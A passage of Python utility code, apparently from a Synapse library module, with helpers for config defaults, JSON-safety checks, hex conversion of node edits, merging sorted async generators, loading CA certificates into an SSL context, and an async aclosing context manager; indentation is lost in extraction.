conf = conf.copy()
# for now just populate defval
for name, info in confdefs:
conf.setdefault(name, info.get('defval'))
return conf
def deprecated(name, curv='2.x', eolv='3.0.0'):
mesg = f'"{name}" is deprecated in {curv} and will be removed in {eolv}'
warnings.warn(mesg, DeprecationWarning)
def reqjsonsafe(item):
'''
Returns None if item is json serializable, otherwise raises an exception
'''
try:
json.dumps(item)
except TypeError as e:
raise s_exc.MustBeJsonSafe(mesg={str(e)}) from None
def jsonsafe_nodeedits(nodeedits):
'''
Hexlify the buid of each node:edits
'''
retn = []
for nodeedit in nodeedits:
newedit = (ehex(nodeedit[0]), *nodeedit[1:])
retn.append(newedit)
return retn
def unjsonsafe_nodeedits(nodeedits):
retn = []
for nodeedit in nodeedits:
buid = nodeedit[0]
if isinstance(buid, str):
newedit = (uhex(buid), *nodeedit[1:])
else:
newedit = nodeedit
retn.append(newedit)
return retn
async def merggenr(genrs, cmprkey):
'''
Iterate multiple sorted async generators and yield their results in order.
Args:
genrs (Sequence[AsyncGenerator[T]]): a sequence of async generator that each yield sorted items
cmprkey(Callable[T, T, bool]): a comparison function over the items yielded
Note:
If the genrs yield increasing items, cmprkey should return True if the first parameter is less
than the second parameter, e.g lambda x, y: x < y.
'''
size = len(genrs)
genrs = list(genrs)
indxs = list(range(size))
async def genrnext(g):
try:
ret = await g.__anext__()
return ret
except StopAsyncIteration:
return novalu
curvs = [await genrnext(g) for g in genrs]
while True:
nextindx = None
nextvalu = novalu
toremove = []
for i in indxs:
curv = curvs[i]
if curv is novalu:
toremove.append(i)
continue
# in the case where we're the first, initialize...
if nextvalu is novalu:
nextindx = i
nextvalu = curv
continue
if cmprkey(curv, nextvalu):
nextindx = i
nextvalu = curv
# check if we're done
if nextvalu is novalu:
return
# Remove spent genrs
for i in toremove:
indxs.remove(i)
yield nextvalu
curvs[nextindx] = await genrnext(genrs[nextindx])
async def merggenr2(genrs, cmprkey=None, reverse=False):
'''
Optimized version of merggenr based on heapq.merge
'''
h = []
h_append = h.append
if reverse:
_heapify = heapq._heapify_max
_heappop = heapq._heappop_max
_heapreplace = heapq._heapreplace_max
direction = -1
else:
_heapify = heapq.heapify
_heappop = heapq.heappop
_heapreplace = heapq.heapreplace
direction = 1
if cmprkey is None:
for order, genr in enumerate(genrs):
try:
nxt = genr.__anext__
h_append([await nxt(), order * direction, nxt])
except StopAsyncIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
valu, _, nxt = s = h[0]
yield valu
s[0] = await nxt()
_heapreplace(h, s)
except StopAsyncIteration:
_heappop(h)
if h:
valu, order, _ = h[0]
yield valu
async for valu in genrs[abs(order)]:
yield valu
return
for order, genr in enumerate(genrs):
try:
nxt = genr.__anext__
valu = await nxt()
h_append([cmprkey(valu), order * direction, valu, nxt])
except StopAsyncIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
_, _, valu, nxt = s = h[0]
yield valu
valu = await nxt()
s[0] = cmprkey(valu)
s[2] = valu
_heapreplace(h, s)
except StopAsyncIteration:
_heappop(h)
if h:
_, order, valu, _ = h[0]
yield valu
async for valu in genrs[abs(order)]:
yield valu
def getSslCtx(cadir, purpose=ssl.Purpose.SERVER_AUTH):
'''
Create as SSL Context and load certificates from a given directory.
Args:
cadir (str): Path to load certificates from.
purpose: SSLContext purposes flags.
Returns:
ssl.SSLContext: A SSL Context object.
'''
sslctx = ssl.create_default_context(purpose=purpose)
for name in os.listdir(cadir):
certpath = os.path.join(cadir, name)
try:
sslctx.load_verify_locations(cafile=certpath)
except Exception: # pragma: no cover
logger.exception(f'Error loading {certpath}')
return sslctx
# TODO: Remove when this is added to contextlib in py 3.10
class aclosing(contextlib.AbstractAsyncContextManager):
"""Async context manager for safely finalizing an asynchronously cleaned-up
resource such as an async generator, calling its ``aclose()`` method.
Code like this:
async with aclosing(<module>.fetch(<arguments>)) as agen:
<block>
is equivalent to this:
agen = <module>.fetch(<arguments>)
try:
<block>
finally:
await agen.aclose()
"""
def __init__(self, thing):
self.thing = thing
async def __aenter__(self):
return self.thing
async def __aexit__(self, exc, cls, tb):
await self.thing.aclose()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.